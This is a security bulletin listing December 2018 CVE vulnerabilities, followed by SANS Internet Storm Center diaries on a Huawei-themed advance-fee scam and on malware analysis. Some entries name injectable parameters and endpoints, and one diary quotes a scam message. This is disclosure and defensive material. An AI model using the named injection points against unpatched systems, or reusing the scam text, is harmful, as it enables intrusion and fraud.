libraw — libraw An error within the “nikon_coolscan_load_raw()” function (internal/dcraw_common.cpp) in LibRaw versions prior to 0.18.9 can be exploited to cause an out-of-bounds read memory access and subsequently cause a crash. 2018-12-07 not yet calculated CVE-2018-5811
MISC
MISC
SECUNIA
MISC
UBUNTU
libraw — libraw An off-by-one error within the “LibRaw::kodak_ycbcr_load_raw()” function (internal/dcraw_common.cpp) in LibRaw versions prior to 0.18.7 can be exploited to cause a heap-based buffer overflow and subsequently cause a crash. 2018-12-07 not yet calculated CVE-2018-5800
BID
REDHAT
MISC
MISC
SECUNIA
MISC
UBUNTU
libraw — libraw An error related to the “LibRaw::panasonic_load_raw()” function (dcraw_common.cpp) in LibRaw versions prior to 0.18.6 can be exploited to cause a heap-based buffer overflow and subsequently cause a crash via a specially crafted TIFF image. 2018-12-07 not yet calculated CVE-2017-16909
MISC
MISC
SECUNIA
MISC
UBUNTU
linux — linux_kernel In the Linux kernel through 4.19.6, a local user could exploit a use-after-free in the ALSA driver by supplying a malicious USB Sound device (with zero interfaces) that is mishandled in usb_audio_probe in sound/usb/card.c. 2018-12-03 not yet calculated CVE-2018-19824
BID
MISC
MISC
MISC
linux — linux_kernel An issue was discovered in the Linux kernel before 4.19.3. crypto_report_one() and related functions in crypto/crypto_user.c (the crypto user configuration API) do not fully initialize structures that are copied to userspace, potentially leaking sensitive memory to user programs. NOTE: this is a CVE-2013-2547 regression but with easier exploitability because the attacker does not need a capability (however, the system must have the CONFIG_CRYPTO_USER kconfig option). 2018-12-04 not yet calculated CVE-2018-19854
MISC
MISC
MISC
litespeed_technologies — openlitespeed The server in LiteSpeed OpenLiteSpeed before 1.5.0 RC6 allows local users to cause a denial of service (buffer overflow) or possibly have unspecified other impact by creating a symlink through which the openlitespeed program can be invoked with a long command name (involving ../ characters), which is mishandled in the LshttpdMain::getServerRootFromExecutablePath function. 2018-12-03 not yet calculated CVE-2018-19792
MISC
litespeed_technologies — openlitespeed The server in LiteSpeed OpenLiteSpeed before 1.5.0 RC6 does not correctly handle requests for byte sequences, allowing an attacker to amplify the response size by requesting the entire response body repeatedly, as demonstrated by an HTTP Range header value beginning with the “bytes=0-,0-” substring. 2018-12-03 not yet calculated CVE-2018-19791
MISC
lxml — lxml An issue was discovered in lxml before 4.2.5. lxml/html/clean.py in the lxml.html.clean module does not remove javascript: URLs that use escaping, allowing a remote attacker to conduct XSS attacks, as demonstrated by “j a v a s c r i p t:” in Internet Explorer. This is a similar issue to CVE-2014-3146. 2018-12-02 not yet calculated CVE-2018-19787
MISC
mcafee — true_key Privilege Escalation vulnerability in Microsoft Windows client in McAfee True Key (TK) 5.1.230.7 and earlier allows local users to execute arbitrary code via specially crafted malware. 2018-12-06 not yet calculated CVE-2018-6757
CONFIRM
mcafee — true_key Authentication Abuse vulnerability in Microsoft Windows client in McAfee True Key (TK) 5.1.230.7 and earlier allows local users to execute unauthorized commands via specially crafted malware. 2018-12-06 not yet calculated CVE-2018-6756
CONFIRM
mcafee — true_key Weak Directory Permission Vulnerability in Microsoft Windows client in McAfee True Key (TK) 5.1.230.7 and earlier allows local users to execute arbitrary code via specially crafted malware. 2018-12-06 not yet calculated CVE-2018-6755
CONFIRM
metinfo — metinfo In Metinfo 6.1.3, include/interface/applogin.php allows setting arbitrary HTTP headers (including the Cookie header), and common.inc.php allows registering variables from the $_COOKIE value. This issue can, for example, be exploited in conjunction with CVE-2018-19835 to bypass many XSS filters such as the Chrome XSS filter. 2018-12-03 not yet calculated CVE-2018-19836
MISC
misp — misp An issue was discovered in MISP 2.4.9x before 2.4.99. In app/Model/Event.php (the STIX 1 import code), an unescaped filename string is used to construct a shell command. This vulnerability can be abused by a malicious authenticated user to execute arbitrary commands by tweaking the original filename of the STIX import. 2018-12-06 not yet calculated CVE-2018-19908
MISC
MISC
moxa — nport_w2x50a An exploitable authenticated command-injection vulnerability exists in the web server functionality of Moxa NPort W2x50A products with firmware before 2.2 Build_18082311. A specially crafted HTTP POST request to /goform/webSettingProfileSecurity can result in running OS commands as the root user. 2018-12-06 not yet calculated CVE-2018-19660
MISC
FULLDISC
moxa — nport_w2x50a An exploitable authenticated command-injection vulnerability exists in the web server functionality of Moxa NPort W2x50A products with firmware before 2.2 Build_18082311. A specially crafted HTTP POST request to /goform/net_WebPingGetValue can result in running OS commands as the root user. This is similar to CVE-2017-12120. 2018-12-06 not yet calculated CVE-2018-19659
MISC
FULLDISC
netapp — data_ontap Data ONTAP operating in 7-Mode versions prior to 8.2.5P2 are susceptible to a vulnerability which discloses sensitive information to an unauthorized user. 2018-12-04 not yet calculated CVE-2018-5496
CONFIRM
netgate — pfsense_ce An exploitable command injection vulnerability exists in the way Netgate pfSense CE 2.4.4-RELEASE processes the parameters of a specific POST request. The attacker can exploit this and gain the ability to execute arbitrary commands on the system. An attacker needs to be able to send authenticated POST requests to the administration web interface. Command injection is possible in the `powerd_normal_mode` parameter. 2018-12-03 not yet calculated CVE-2018-4019
MISC
netgate — pfsense_ce An exploitable command injection vulnerability exists in the way Netgate pfSense CE 2.4.4-RELEASE processes the parameters of a specific POST request. The attacker can exploit this and gain the ability to execute arbitrary commands on the system. An attacker needs to be able to send authenticated POST requests to the administration web interface. Command injection is possible in the `powerd_battery_mode` POST parameter. 2018-12-03 not yet calculated CVE-2018-4021
MISC
netgate — pfsense_ce An exploitable command injection vulnerability exists in the way Netgate pfSense CE 2.4.4-RELEASE processes the parameters of a specific POST request. The attacker can exploit this and gain the ability to execute arbitrary commands on the system. An attacker needs to be able to send authenticated POST requests to the administration web interface. Command injection is possible in the `powerd_ac_mode` POST parameter parameter. 2018-12-03 not yet calculated CVE-2018-4020
MISC
nice_incontact — multiple_products Two stack-based buffer overflow vulnerabilities have been discovered in CX-One Versions 4.42 and prior (CX-Programmer Versions 9.66 and prior and CX-Server Versions 5.0.23 and prior). When processing project files, the application allows input data to exceed the buffer. An attacker could use a specially crafted project file to overflow the buffer and execute code under the privileges of the application. 2018-12-04 not yet calculated CVE-2018-18993
BID
MISC
nice_incontact — multiple_products In CX-One Versions 4.42 and prior (CX-Programmer Versions 9.66 and prior and CX-Server Versions 5.0.23 and prior), when processing project files, the application fails to check if it is referencing freed memory. An attacker could use a specially crafted project file to exploit and execute code under the privileges of the application. 2018-12-04 not yet calculated CVE-2018-18989
BID
MISC
norton — password_manger_for_android Norton Password Manager for Android (formerly Norton Identity Safe) may be susceptible to a cross site scripting (XSS) exploit, which is a type of issue that can enable attackers to inject client-side scripts into web pages viewed by other users. A cross-site scripting vulnerability may be used by attackers to potentially bypass access controls such as the same-origin policy. 2018-12-06 not yet calculated CVE-2018-18362
BID
CONFIRM
nuuo — nvrmini2 NUUO NVRmini2 Network Video Recorder firmware through 3.9.1 allows remote attackers to execute arbitrary code or cause a denial of service (buffer overflow), resulting in ability to read camera feeds or reconfigure the device. 2018-12-05 not yet calculated CVE-2018-19864
MISC
MISC
nuuo — nvrmini2 NUUO NVRMini2 version 3.9.1 is vulnerable to authenticated remote command injection. An attacker can send crafted requests to upgrade_handle.php to execute OS commands as root. 2018-11-30 not yet calculated CVE-2018-15716
BID
MISC
EXPLOIT-DB
MISC
onionshare — onionshare The debug_mode function in web/web.py in OnionShare through 1.3.1, when –debug is enabled, uses the /tmp/onionshare_server.log pathname for logging, which might allow local users to overwrite files or obtain sensitive information by using this pathname. 2018-12-07 not yet calculated CVE-2018-19960
MISC
openrefine — openrefine OpenRefine before 3.5 allows directory traversal via a relative pathname in a ZIP archive. 2018-12-05 not yet calculated CVE-2018-19859
MISC
osb — vt-designer VT-Designer Version 2.1.7.31 is vulnerable by the program reading the contents of a file (which is already in memory) into another heap-based buffer, which may cause the program to crash or allow remote code execution. 2018-11-30 not yet calculated CVE-2018-18983
BID
MISC
osb — vt-designer VT-Designer Version 2.1.7.31 is vulnerable by the program populating objects with user supplied input via a file without first checking for validity, allowing attacker supplied input to be written to known memory locations. This may cause the program to crash or allow remote code execution. 2018-11-30 not yet calculated CVE-2018-18987
BID
MISC
perl — perl Perl before 5.26.3 and 5.28.0 before 5.28.1 has a buffer overflow via a crafted regular expression that triggers invalid write operations. 2018-12-05 not yet calculated CVE-2018-18312
SECTRACK
CONFIRM
FEDORA
CONFIRM
CONFIRM
CONFIRM
UBUNTU
DEBIAN
perl — perl Perl before 5.26.3 has a buffer overflow via a crafted regular expression that triggers invalid write operations. 2018-12-07 not yet calculated CVE-2018-18314
SECTRACK
CONFIRM
CONFIRM
FEDORA
CONFIRM
CONFIRM
UBUNTU
DEBIAN
perl — perl Perl before 5.26.3 and 5.28.x before 5.28.1 has a buffer overflow via a crafted regular expression that triggers invalid write operations. 2018-12-07 not yet calculated CVE-2018-18311
SECTRACK
CONFIRM
CONFIRM
MLIST
FEDORA
CONFIRM
CONFIRM
CONFIRM
UBUNTU
UBUNTU
DEBIAN
perl — perl Perl before 5.26.3 has a buffer over-read via a crafted regular expression that triggers disclosure of sensitive information from process memory. 2018-12-07 not yet calculated CVE-2018-18313
SECTRACK
CONFIRM
CONFIRM
FEDORA
CONFIRM
CONFIRM
UBUNTU
UBUNTU
DEBIAN
philips — healthsuite_health_android_app Philips HealthSuite Health Android App, all versions. The software uses simple encryption that is not strong enough for the level of protection required. 2018-12-07 not yet calculated CVE-2018-19001
BID
MISC
php — php ext/imap/php_imap.c in PHP 5.x and 7.x before 7.3.0 allows remote attackers to cause a denial of service (NULL pointer dereference and application crash) via an empty string in the message argument to the imap_mail function. 2018-12-07 not yet calculated CVE-2018-19935
MISC
pixelimity_cms — pixelimity_cms Pixelimity 1.0 has Persistent XSS via the admin/portfolio.php data[title] parameter, as demonstrated by a crafted onload attribute of an SVG element. 2018-12-06 not yet calculated CVE-2018-19919
MISC
pluck — pluck Pluck v4.7.7 allows CSRF via admin.php?action=settings. 2018-12-04 not yet calculated CVE-2018-16634
MISC
pluck — pluck Pluck v4.7.7 allows XSS via the admin.php?action=editpage&page= page title. 2018-12-04 not yet calculated CVE-2018-16633
MISC
policykit/polkit — policykit/polkit A flaw was found in PolicyKit (aka polkit) 0.115 that allows a user with a uid greater than INT_MAX to successfully execute any systemctl command. 2018-12-03 not yet calculated CVE-2018-19788
MISC
MISC
DEBIAN
powerdns — recursor An issue has been found in PowerDNS Recursor before version 4.1.8 where a remote attacker sending a DNS query can trigger an out-of-bounds memory read while computing the hash of the query for a packet cache lookup, possibly leading to a crash. 2018-12-03 not yet calculated CVE-2018-16855
CONFIRM
MISC
proxygen — proxygen A potential denial-of-service issue in the Proxygen handling of invalid HTTP2 settings which can cause the server to spend disproportionate resources. This affects all supported versions of HHVM (3.24.3 and 3.21.7 and below) when using the proxygen server to handle HTTP2 requests. 2018-12-03 not yet calculated CVE-2018-6332
MISC
python — simplehttpserver A Path Traversal in simplehttpserver versions <=0.2.1 allows to list any file in another folder of web root. 2018-12-04 not yet calculated CVE-2018-16478
MISC
qemu — qemu The Bluetooth subsystem in QEMU mishandles negative values for length variables, leading to memory corruption. 2018-12-06 not yet calculated CVE-2018-19665
MLIST
BID
MLIST
qt — qt
 
A keystroke logging issue was discovered in Virtual Keyboard in Qt 5.7.x, 5.8.x, 5.9.x, 5.10.x, and 5.11.x before 5.11.3. 2018-12-05 not yet calculated CVE-2018-19865
MISC
MISC
MISC
MISC
MISC
MISC
MISC
MISC
MISC
MISC
MISC
qualcomm — android In all android releases(Android for MSM, Firefox OS for MSM, QRD Android) from CAF using the linux kernel, Possible buffer overflow in WLAN function due to lack of input validation in values received from firmware. 2018-12-07 not yet calculated CVE-2018-11905
BID
CONFIRM
qualcomm — android In all android releases(Android for MSM, Firefox OS for MSM, QRD Android) from CAF using the linux kernel, Userspace can pass IEs to the host driver and if multiple append commands are received, then the integer variable that stores the length can overflow and the subsequent copy of the IE data may potentially lead to a heap buffer overflow. 2018-12-07 not yet calculated CVE-2017-14888
CONFIRM
CONFIRM
qualcomm — android In all android releases(Android for MSM, Firefox OS for MSM, QRD Android) from CAF using the linux kernel, While processing the RIC Data Descriptor IE in an artificially crafted 802.11 frame with IE length more than 255, an infinite loop may potentially occur resulting in a denial of service. 2018-12-07 not yet calculated CVE-2017-15835
CONFIRM
CONFIRM
quicken — quicken_deluxe_2018_for_mac An exploitable information disclosure vulnerability exists in the password protection functionality of Quicken Deluxe 2018 for Mac version 5.2.2. A specially crafted sqlite3 request can cause the removal of the password protection, allowing an attacker to access and modify the data without knowing the password. An attacker needs to have access to the password-protected files to trigger this vulnerability. 2018-12-03 not yet calculated CVE-2018-3854
MISC
radare — radare2 opmov in libr/asm/p/asm_x86_nz.c in radare2 before 3.1.0 allows attackers to cause a denial of service (buffer over-read) via crafted x86 assembly data, as demonstrated by rasm2. 2018-12-04 not yet calculated CVE-2018-19843
MISC
MISC
radare — radare2 getToken in libr/asm/p/asm_x86_nz.c in radare2 before 3.1.0 allows attackers to cause a denial of service (stack-based buffer over-read) via crafted x86 assembly data, as demonstrated by rasm2. 2018-12-04 not yet calculated CVE-2018-19842
MISC
MISC
red_hat — enterprise_linux A Bleichenbacher type side-channel based padding oracle attack was found in the way nettle handles endian conversion of RSA decrypted PKCS#1 v1.5 data. An attacker who is able to run a process on the same physical core as the victim process, could use this flaw extract plaintext or in some cases downgrade any TLS connections to a vulnerable server. 2018-12-03 not yet calculated CVE-2018-16869
MISC
BID
CONFIRM
red_hat — enterprise_linux A Bleichenbacher type side-channel based padding oracle attack was found in the way gnutls handles verification of RSA decrypted PKCS#1 v1.5 data. An attacker who is able to run process on the same physical core as the victim process, could use this to extract plaintext or in some cases downgrade any TLS connections to a vulnerable server. 2018-12-03 not yet calculated CVE-2018-16868
MISC
BID
CONFIRM
red_hat — enterprise_linux_7 It was found that RHSA-2018:2918 did not fully fix CVE-2018-16509. An attacker could possibly exploit another variant of the flaw and bypass the -dSAFER protection to, for example, execute arbitrary shell commands via a specially crafted PostScript document. This only affects ghostscript 9.07 as shipped with Red Hat Enterprise Linux 7. 2018-12-03 not yet calculated CVE-2018-16863
CONFIRM
CONFIRM
CONFIRM
CONFIRM
REDHAT
CONFIRM
rockwell_automation — micrologix_1400_controllers_and_1756_controllogix_communications_modules Rockwell Automation MicroLogix 1400 Controllers and 1756 ControlLogix Communications Modules An unauthenticated, remote threat actor could send a CIP connection request to an affected device, and upon successful connection, send a new IP configuration to the affected device even if the controller in the system is set to Hard RUN mode. When the affected device accepts this new IP configuration, a loss of communication occurs between the device and the rest of the system as the system traffic is still attempting to communicate with the device via the overwritten IP address. 2018-12-07 not yet calculated CVE-2018-17924
BID
MISC
sales_and_company_management_system — sales_and_company_management_system An issue was discovered in Sales & Company Management System (SCMS) through 2018-06-06. It has SQL injection via the member/member_order.php type parameter, related to the O_state parameter. 2018-12-06 not yet calculated CVE-2018-19925
MISC
sales_and_company_management_system — sales_and_company_management_system An issue was discovered in Sales & Company Management System (SCMS) through 2018-06-06. An email address can be modified in between the request for a validation code and the entry of the validation code, leading to storage of an XSS payload contained in the modified address. 2018-12-06 not yet calculated CVE-2018-19924
MISC
sales_and_company_management_system — sales_and_company_management_system An issue was discovered in Sales & Company Management System (SCMS) through 2018-06-06. There is member/member_email.php?action=edit CSRF. 2018-12-06 not yet calculated CVE-2018-19923
MISC
santa_cruz_operation — tarantella_enterprise Tarantella Enterprise before 3.11 allows Directory Traversal. 2018-12-05 not yet calculated CVE-2018-19753
MISC
FULLDISC
santa_cruz_operation — tarantella_enterprise Tarantella Enterprise before 3.11 allows bypassing Access Control. 2018-12-05 not yet calculated CVE-2018-19754
MISC
FULLDISC
sass — libsass In LibSass prior to 3.5.5, functions inside ast.cpp for IMPLEMENT_AST_OPERATORS expansion allow attackers to cause a denial-of-service resulting from stack consumption via a crafted sass file, as demonstrated by recursive calls involving clone(), cloneChildren(), and copy(). 2018-12-04 not yet calculated CVE-2018-19838
MISC
sass — libsass In LibSass 3.5.5, a NULL Pointer Dereference in the function Sass::Selector_List::populate_extends in SharedPtr.hpp (used by ast.cpp and ast_selectors.cpp) may cause a Denial of Service (application crash) via a crafted sass input file. 2018-12-03 not yet calculated CVE-2018-19797
MISC
sass — libsass In LibSass prior to 3.5.5, Sass::Eval::operator()(Sass::Binary_Expression*) inside eval.cpp allows attackers to cause a denial-of-service resulting from stack consumption via a crafted sass file, because of certain incorrect parsing of ‘%’ as a modulo operator in parser.cpp. 2018-12-04 not yet calculated CVE-2018-19837
MISC
MISC
sass — libsass In LibSass prior to 3.5.5, the function handle_error in sass_context.cpp allows attackers to cause a denial-of-service resulting from a heap-based buffer over-read via a crafted sass file. 2018-12-04 not yet calculated CVE-2018-19839
MISC
MISC
sass — libsass In LibSass 3.5.5, a use-after-free vulnerability exists in the SharedPtr class in SharedPtr.cpp (or SharedPtr.hpp) that may cause a denial of service (application crash) or possibly have unspecified other impact. 2018-12-03 not yet calculated CVE-2018-19827
MISC
sass — libsass In inspect.cpp in LibSass 3.5.5, a high memory footprint caused by an endless loop (containing a Sass::Inspect::operator()(Sass::String_Quoted*) stack frame) may cause a Denial of Service via crafted sass input files with stray ‘&’ or ‘/’ characters. 2018-12-03 not yet calculated CVE-2018-19826
MISC
solarwinds — sftp/scp_server In SolarWinds SFTP/SCP server through 2018-09-10, the configuration file is world readable and writable, and stores user passwords in an insecure manner, allowing an attacker to determine passwords for potentially privileged accounts. This also grants the attacker an ability to backdoor the server. 2018-12-05 not yet calculated CVE-2018-16791
FULLDISC
solarwinds — sftp/scp_server SolarWinds SFTP/SCP server through 2018-09-10 is vulnerable to XXE via a world readable and writable configuration file that allows an attacker to exfiltrate data. 2018-12-05 not yet calculated CVE-2018-16792
FULLDISC
spidercontrol — scada_webserver Reflected cross-site scripting (non-persistent) in SCADA WebServer (Versions prior to 2.03.0001) could allow an attacker to send a crafted URL that contains JavaScript, which can be reflected off the web application to the victim’s browser. 2018-12-04 not yet calculated CVE-2018-18991
BID
MISC
thinkcmf — thinkcmf ThinkCMF X2.2.2 has SQL Injection via the method edit_post in ArticleController.class.php and is exploitable by normal authenticated users via the post[id][1] parameter in an article edit_post action. 2018-12-05 not yet calculated CVE-2018-19898
MISC
thinkcmf — thinkcmf ThinkCMF X2.2.2 has SQL Injection via the function edit_post() in NavController.class.php and is exploitable with the manager privilege via the parentid parameter in a nav action. 2018-12-05 not yet calculated CVE-2018-19895
MISC
thinkcmf — thinkcmf ThinkCMF X2.2.2 has SQL Injection via the function delete() in SlideController.class.php and is exploitable with the manager privilege via the ids[] parameter in a slide action. 2018-12-05 not yet calculated CVE-2018-19896
MISC
thinkcmf — thinkcmf ThinkCMF X2.2.2 has SQL Injection via the function _listorders() in AdminbaseController.class.php and is exploitable with the manager privilege via the listorders[key][1] parameter in a Link listorders action. 2018-12-05 not yet calculated CVE-2018-19897
MISC
thinkcmf — thinkcmf ThinkCMF X2.2.2 has SQL Injection via the functions check() and delete() in CommentadminController.class.php and is exploitable with the manager privilege via the ids[] parameter in a commentadmin action. 2018-12-05 not yet calculated CVE-2018-19894
MISC
videolan — vlc_media_player The CAF demuxer in modules/demux/caf.c in VideoLAN VLC media player 3.0.4 may read memory from an uninitialized pointer when processing magic cookies in CAF files, because a ReadKukiChunk() cast converts a return value to an unsigned int even if that value is negative. This could result in a denial of service and/or a potential infoleak. 2018-12-05 not yet calculated CVE-2018-19857
BID
MISC
MISC
vmware — esxi VMware ESXi 6.7 without ESXi670-201811401-BG and VMware ESXi 6.5 without ESXi650-201811301-BG contain uninitialized stack memory usage in the vmxnet3 virtual network adapter which may lead to an information leak from host to guest. 2018-12-04 not yet calculated CVE-2018-6982
BID
SECTRACK
CONFIRM
vmware — multiple_products VMware ESXi 6.7 without ESXi670-201811401-BG and VMware ESXi 6.5 without ESXi650-201811301-BG, VMware ESXi 6.0 without ESXi600-201811401-BG, VMware Workstation 15, VMware Workstation 14.1.3 or below, VMware Fusion 11, VMware Fusion 10.1.3 or below contain uninitialized stack memory usage in the vmxnet3 virtual network adapter which may allow a guest to execute code on the host. 2018-12-04 not yet calculated CVE-2018-6981
BID
SECTRACK
SECTRACK
CONFIRM
wavpack — wavpack The function WavpackPackInit in pack_utils.c in libwavpack.a in WavPack through 5.1.0 allows attackers to cause a denial-of-service (resource exhaustion caused by an infinite loop) via a crafted wav audio file because WavpackSetConfiguration64 mishandles a sample rate of zero. 2018-12-04 not yet calculated CVE-2018-19840
MISC
MISC
UBUNTU
wavpack — wavpack The function WavpackVerifySingleBlock in open_utils.c in libwavpack.a in WavPack through 5.1.0 allows attackers to cause a denial-of-service (out-of-bounds read and application crash) via a crafted WavPack Lossless Audio file, as demonstrated by wvunpack. 2018-12-04 not yet calculated CVE-2018-19841
MISC
MISC
UBUNTU
wordpress — wordpress An open redirect in the Ninja Forms plugin before 3.3.19.1 for WordPress allows Remote Attackers to redirect a user via the lib/StepProcessing/step-processing.php (aka submissions download page) redirect parameter. 2018-12-03 not yet calculated CVE-2018-19796
MISC
MISC
wordpress — wordpress There is a reflected XSS vulnerability in WordPress Arigato Autoresponder and News letter v2.5.1.8 This vulnerability requires administrative privileges to exploit. 2018-12-03 not yet calculated CVE-2018-1002001
MISC
MISC
EXPLOIT-DB
wordpress — wordpress There is blind SQL injection in WordPress Arigato Autoresponder and Newsletter v2.5.1.8 These vulnerabilities require administrative privileges to exploit. There is an exploitable blind SQL injection vulnerability via the del_ids variable by POST request. 2018-12-03 not yet calculated CVE-2018-1002000
MISC
MISC
EXPLOIT-DB
wordpress — wordpress There is a reflected XSS vulnerability in WordPress Arigato Autoresponder and News letter v2.5.1.8 This vulnerability requires administrative privileges to exploit. 2018-12-03 not yet calculated CVE-2018-1002003
MISC
MISC
EXPLOIT-DB
wordpress — wordpress There is a reflected XSS vulnerability in WordPress Arigato Autoresponder and News letter v2.5.1.8 This vulnerability requires administrative privileges to exploit. 2018-12-03 not yet calculated CVE-2018-1002002
MISC
MISC
EXPLOIT-DB
wordpress — wordpress These vulnerabilities require administrative privileges to exploit. There is an XSS vulnerability in bft_list.html.php:43: via the filter_signup_date parameter. 2018-12-03 not yet calculated CVE-2018-1002005
MISC
MISC
EXPLOIT-DB
wordpress — wordpress There is a reflected XSS vulnerability in WordPress Arigato Autoresponder and News letter v2.5.1.8 This vulnerability requires administrative privileges to exploit. 2018-12-03 not yet calculated CVE-2018-1002004
MISC
MISC
EXPLOIT-DB
wordpress — wordpress There is a reflected XSS vulnerability in WordPress Arigato Autoresponder and News letter v2.5.1.8 This vulnerability requires administrative privileges to exploit. There is an XSS vulnerability in integration-contact-form.html.php:15: via POST request variable html_id. 2018-12-03 not yet calculated CVE-2018-1002007
MISC
MISC
EXPLOIT-DB
wordpress — wordpress There is a reflected XSS vulnerability in WordPress Arigato Autoresponder and News letter v2.5.1.8 This vulnerability requires administrative privileges to exploit. There is an XSS vulnerability in list-user.html.php:4: via GET request offset variable. 2018-12-03 not yet calculated CVE-2018-1002008
MISC
MISC
EXPLOIT-DB
wordpress — wordpress There is a reflected XSS vulnerability in WordPress Arigato Autoresponder and News letter v2.5.1.8 This vulnerability requires administrative privileges to exploit. There is an XSS vulnerability in unsubscribe.html.php:3: via GET reuqest to the email variable. 2018-12-03 not yet calculated CVE-2018-1002009
MISC
MISC
EXPLOIT-DB
wordpress — wordpress These vulnerabilities require administrative privileges to exploit. There is an XSS vulnerability in integration-contact-form.html.php:14: via POST request variable classes 2018-12-03 not yet calculated CVE-2018-1002006
MISC
MISC
EXPLOIT-DB
wordpress — wordpress login.php in Adiscon LogAnalyzer before 4.1.7 has XSS via the Login Button Referer field. 2018-12-05 not yet calculated CVE-2018-19877
MISC
EXPLOIT-DB
xen — xen An issue was discovered in Xen through 4.11.x allowing 64-bit PV guest OS users to cause a denial of service (host OS crash) because #GP[0] can occur after a non-canonical address is passed to the TLB flushing code. NOTE: this issue exists because of an incorrect CVE-2017-5754 (aka Meltdown) mitigation. 2018-12-07 not yet calculated CVE-2018-19965
MISC
xen — xen An issue was discovered in Xen through 4.11.x allowing x86 PV guest OS users to cause a denial of service (host OS crash) or possibly gain host OS privileges because of an interpretation conflict for a union data structure associated with shadow paging. NOTE: this issue exists because of an incorrect fix for CVE-2017-15595. 2018-12-07 not yet calculated CVE-2018-19966
MISC
xen — xen An issue was discovered in Xen 4.11.x allowing x86 guest OS users to cause a denial of service (host OS hang) because the p2m lock remains unavailable indefinitely in certain error conditions. 2018-12-07 not yet calculated CVE-2018-19964
MISC
xen — xen An issue was discovered in Xen 4.11 allowing HVM guest OS users to cause a denial of service (host OS crash) or possibly gain host OS privileges because x86 IOREQ server resource accounting (for external emulators) was mishandled. 2018-12-07 not yet calculated CVE-2018-19963
MISC
xen — xen An issue was discovered in Xen through 4.11.x on AMD x86 platforms, possibly allowing guest OS users to gain host OS privileges because small IOMMU mappings are unsafely combined into larger ones. 2018-12-07 not yet calculated CVE-2018-19962
MISC
xen — xen An issue was discovered in Xen through 4.11.x on AMD x86 platforms, possibly allowing guest OS users to gain host OS privileges because TLB flushes do not always occur after IOMMU mapping changes. 2018-12-07 not yet calculated CVE-2018-19961
MISC
xen — xen An issue was discovered in Xen through 4.11.x on Intel x86 platforms allowing guest OS users to cause a denial of service (host OS hang) because Xen does not work around Intel’s mishandling of certain HLE transactions associated with the KACQUIRE instruction prefix. 2018-12-07 not yet calculated CVE-2018-19967
MISC
xiaomi — daisy-o-miss_mi_a2_lite_and_redmi6_devices The Goodix GT9xx touchscreen driver for custom Linux kernels on Xiaomi daisy-o-oss Mi A2 Lite and RedMi6 pro devices through 2018-08-27 has a NULL pointer dereference in kfree after a kmalloc failure in gtp_read_Color in drivers/input/touchscreen/gt917d/gt9xx.c. 2018-12-07 not yet calculated CVE-2018-19939
MISC
yunohost — yunohost Two XSS vulnerabilities are located in the profile edition page of the user panel of the YunoHost 2.7.2 through 2.7.14 web application. By injecting a JavaScript payload, these flaws could be used to manipulate a user’s session. 2018-12-04 not yet calculated CVE-2018-11348
MISC
yunohost — yunohost The YunoHost 2.7.2 through 2.7.14 web application is affected by one HTTP Response Header Injection. This flaw allows an attacker to inject, into the response from the server, one or several HTTP Header. It requires an interaction with the user to send him the malicious link. It could be used to perform other attacks such as user redirection to a malicious website, HTTP response splitting, or HTTP cache poisoning. 2018-12-04 not yet calculated CVE-2018-11347
MISC
yzmcms — yzmcms An issue was discovered in YzmCMS 5.2. XSS exists via the admin/content/search.html searinfo parameter. 2018-12-04 not yet calculated CVE-2018-19849
MISC
zenitel — ip-stationweb Zenitel Norway IP-StationWeb before 4.2.3.9 allows stored XSS via the Display Name for Station Status or Account Settings, related to the goform/zForm_save_changes sip_nick parameter. The password of alphaadmin for the admin account may be used for authentication in some cases. 2018-12-06 not yet calculated CVE-2018-19927
MISC
zenitel — ip-stationweb Zenitel Norway IP-StationWeb before 4.2.3.9 allows reflected XSS via the goform/ PATH_INFO. 2018-12-06 not yet calculated CVE-2018-19926
MISC
zoho_manageengine — opmanager Zoho ManageEngine OpManager 12.3 before 123237 has XSS in the domain controller. 2018-12-06 not yet calculated CVE-2018-19921
MISC
zte — zxin10_routers All versions up to ZXINOS-RESV1.01.43 of the ZTE ZXIN10 product Orange branch are impacted by improper access control vulnerability. Due to improper access control to devcomm process, an unauthorized remote attacker can exploit this vulnerability to execute arbitrary code with root privileges. 2018-12-07 not yet calculated CVE-2018-7364
CONFIRM

Back to top


This product is provided subject to this Notification and this Privacy & Use policy.

Arrest of Huawei CFO Inspires Advanced Fee Scam, (Sun, Dec 9th)

This post was originally published on this site

Last week, the arrest of MENG Wanzou made big waves in the news. Ms. Meng was arrested in Canada based on an arrest warrant issued for the United States Department of justice. Ms. Meng, as CFO of Huawei and possible heir to her father, the CEO of Huawei, is assumed to have access to substantial wealth. This led to a wave of advanced fee scams levering this news. 

Advanced fee scams have probably been most commonly associated with “Nigerian Prince” scams. The trick is to promise substantial wealth in exchange for a relatively small advanced fee.

In this case, the message sent via WeChat suggested that a corrupt Canadian guard would let Ms. Meng escape for a few thousand dollars. The recipient of the message is asked to transfer the money to the guard’s account, and promised a large amount of money once Ms. Meng is released:

Translation: “Hello, I am MENG Wanzou. Currently, I have been detained by Canadian customs. I have limited use of my phone. Right now CIA is trying to get me into the hands of the US government. I bribed the guard of my room, and urgently need US$2000 to get out of here. Once I am out, I will reward you 200,000 shares of Huawei.  I will be good on my word. if you are single, we can also discuss the important thing in life. The guard’s name is David, the account number is 52836153836252, swift 55789034. I will be good on my word”

Of course, it is questionable how successful a crude attempt like this will be. But sadly, experience tells us that there are still people falling for the old “Nigerian scam”. By targeting Chinese individuals via WeChat, the scam may have a higher success rate than more widely distributed scams.


Johannes B. Ullrich, Ph.D. , Dean of Research, SANS Technology Institute
Twitter|

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

Quickie: String Analysis is Still Useful, (Sun, Dec 9th)

This post was originally published on this site

String analysis: extracting and analyzing strings from binary files (like executables) to assist with reverse engineering.

It’s a simple method, but still useful, if you don’t have to spend hours sifting through all strings produced by the string tool. I have a tip to quickly find “interesting” strings: sort the output of the strings tool by string length. Start with the shortest strings, and end with the longest strings.

Take for example the analysis of a malicious document, that involved many steps and requires good knowledge of different file formats.

Just by extracting the strings of this document and sorting them by length, you immediately find the powershell command:

I developed my own strings.py tool, and option -L sorts strings by increasing lenght.

Didier Stevens
Senior handler
Microsoft MVP
blog.DidierStevens.com DidierStevensLabs.com

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

Reader Submission: MHT File Inside a ZIP File, (Sat, Dec 8th)

This post was originally published on this site

Reader Jason submitted a ZIP file received via email. It contains an MHT file, an when Jason received it, it had 0 detections on VirusTotal.

When an analyst receives an unknown file with 0 detections on VirusTotal, the analyst will often try to determine of the file is malicious or not via other means than anti-virus.

